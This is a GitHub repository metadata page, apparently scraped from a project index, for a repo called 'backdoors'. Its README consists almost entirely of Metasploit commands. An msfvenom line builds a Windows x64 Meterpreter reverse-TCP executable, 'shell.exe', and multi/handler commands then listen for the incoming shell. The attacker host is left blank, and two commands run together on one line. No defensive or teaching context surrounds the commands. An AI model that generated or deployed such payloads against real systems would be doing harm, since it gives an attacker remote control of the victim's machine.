https://github.com/surcodev/backdoors
https://github.com/surcodev/backdoors
Last synced: 3 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/surcodev/backdoors
- Owner: surcodev
- Created: 2024-12-18T18:48:13.000Z (6 months ago)
- Default Branch: main
- Last Pushed: 2025-01-08T03:19:00.000Z (6 months ago)
- Last Synced: 2025-02-03T14:51:57.932Z (5 months ago)
- Size: 249 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe shell.exeuse exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost
set lport
show options
run
```